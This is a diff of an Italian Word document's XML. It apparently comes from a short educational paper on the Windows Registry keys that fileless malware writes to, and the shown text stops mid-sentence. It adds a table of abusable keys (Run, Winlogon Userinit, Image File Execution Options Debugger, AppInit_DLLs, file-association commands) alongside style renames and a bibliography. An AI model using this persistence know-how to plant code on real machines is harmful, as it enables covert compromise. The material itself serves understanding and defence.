-    <w:next w:val="Normal"/>
-    <w:link w:val="TitleChar"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="TitoloCarattere"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1382,10 +5390,10 @@
       <w:szCs w:val="56"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
-    <w:name w:val="Title Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Title"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="TitoloCarattere">
+    <w:name w:val="Titolo Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo"/>
     <w:uiPriority w:val="10"/>
     <w:rsid w:val="00676D58"/>
     <w:rPr>
@@ -1396,11 +5404,11 @@
       <w:szCs w:val="56"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Subtitle">
+  <w:style w:type="paragraph" w:styleId="Sottotitolo">
     <w:name w:val="Subtitle"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="SubtitleChar"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="SottotitoloCarattere"/>
     <w:uiPriority w:val="11"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1417,10 +5425,10 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
-    <w:name w:val="Subtitle Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Subtitle"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SottotitoloCarattere">
+    <w:name w:val="Sottotitolo Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Sottotitolo"/>
     <w:uiPriority w:val="11"/>
     <w:rsid w:val="00676D58"/>
     <w:rPr>
@@ -1431,11 +5439,11 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Quote">
+  <w:style w:type="paragraph" w:styleId="Citazione">
     <w:name w:val="Quote"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="QuoteChar"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="CitazioneCarattere"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1449,10 +5457,10 @@
       <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
-    <w:name w:val="Quote Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Quote"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="CitazioneCarattere">
+    <w:name w:val="Citazione Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Citazione"/>
     <w:uiPriority w:val="29"/>
     <w:rsid w:val="00676D58"/>
     <w:rPr>
@@ -1461,9 +5469,9 @@
       <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="ListParagraph">
+  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
     <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normale"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1472,9 +5480,9 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
-  <w:style w:type="character" w:styleId="IntenseEmphasis">
+  <w:style w:type="character" w:styleId="Enfasiintensa">
     <w:name w:val="Intense Emphasis"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
     <w:uiPriority w:val="21"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1484,11 +5492,11 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="IntenseQuote">
+  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
     <w:name w:val="Intense Quote"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="IntenseQuoteChar"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="CitazioneintensaCarattere"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1507,10 +5515,10 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
-    <w:name w:val="Intense Quote Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="IntenseQuote"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="CitazioneintensaCarattere">
+    <w:name w:val="Citazione intensa Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Citazioneintensa"/>
     <w:uiPriority w:val="30"/>
     <w:rsid w:val="00676D58"/>
     <w:rPr>
@@ -1519,9 +5527,9 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="IntenseReference">
+  <w:style w:type="character" w:styleId="Riferimentointenso">
     <w:name w:val="Intense Reference"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
     <w:uiPriority w:val="32"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1532,6 +5540,14 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
       <w:spacing w:val="5"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Bibliografia">
+    <w:name w:val="Bibliography"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:uiPriority w:val="37"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004C1E3B"/>
   </w:style>
 </w:styles>
 </file>
@@ -1849,4 +5865,51 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6">
+  <b:Source>
+    <b:Tag>Mic25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{6E257BE5-484A-4FD3-BA7D-6789BE9B90F6}</b:Guid>
+    <b:Year>2025</b:Year>
+    <b:LCID>it-IT</b:LCID>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Microsoft</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Month>Gennaio</b:Month>
+    <b:Day>15</b:Day>
+    <b:URL>https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</b:URL>
+    <b:Title>Informazioni sul Registro di sistema di Windows per gli utenti esperti</b:Title>
+    <b:InternetSiteTitle>Microsoft Learn</b:InternetSiteTitle>
+    <b:RefOrder>1</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spr20</b:Tag>
+    <b:SourceType>JournalArticle</b:SourceType>
+    <b:Guid>{D47B82CA-CEB4-4781-9656-A79BD11CA790}</b:Guid>
+    <b:Title>An emerging threat Fileless malware: a survey and research challenges</b:Title>
+    <b:Year>2020</b:Year>
+    <b:URL>https://link.springer.com/article/10.1186/s42400-019-0043-x</b:URL>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Springer Nature</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:JournalName>Springer Nature Link</b:JournalName>
+    <b:LCID>en-US</b:LCID>
+    <b:RefOrder>2</b:RefOrder>
+  </b:Source>
+</b:Sources>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FECABDFA-65E1-452A-9301-4120BD5EB54D}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -22,2245 +22,1053 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>Il Registro di Sistema di Windows è un database gerarchico che memorizza le impostazioni di configurazione</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve">I </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
         </w:rPr>
         <w:t>fileless malware</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve">possono sfruttare </w:t>
       </w:r>
       <w:r>
-        <w:t>queste chiavi d</w:t>
-      </w:r>
-      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">particolari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>chiavi d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve">el registro </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve">per portare a compimento i </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>loro</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve"> scop</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>i</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. Le HKEY non sono tutte uguali, difatti </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ne </w:t>
-      </w:r>
-      <w:r>
-        <w:t>esistono</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> di diverse categorie</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Le HKEY non hanno tutte lo stesso scopo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>, ad esempio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="7033"/>
+        <w:gridCol w:w="2595"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Chiave di Registro</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Funzione / Abuso</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>HKCU\Software\Microsoft\Windows\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>CurrentVersion</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>\Run</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Persistenza a livello utente con esecuzione automatica al logon</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>HKLM\Software\Microsoft\Windows\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>CurrentVersion</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>\Run</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Persistenza globale per tutti gli utenti</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>CurrentVersion</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Winlogon</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Userinit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Esecuzione di codice durante la fase iniziale del logon</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>CurrentVersion</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve">\Image File </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Execution</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Options&lt;programma.exe&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Hijacking</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> dell’esecuzione tramite valore “Debugger”</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>CurrentVersion</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>\Windows\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>AppInit_DLLs</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Caricamento di DLL in più processi (iniezione di codice)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>HKCR&lt;estensione&gt;\shell\open\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>command</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>Esecuzione di codice tramite modifica dell’associazione file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Cosa scrivono i fileless malware sui registri</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I malware fileless, sfruttando opportunamente le chiavi di registro di </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sistema </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scrivendo all’interno comandi “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
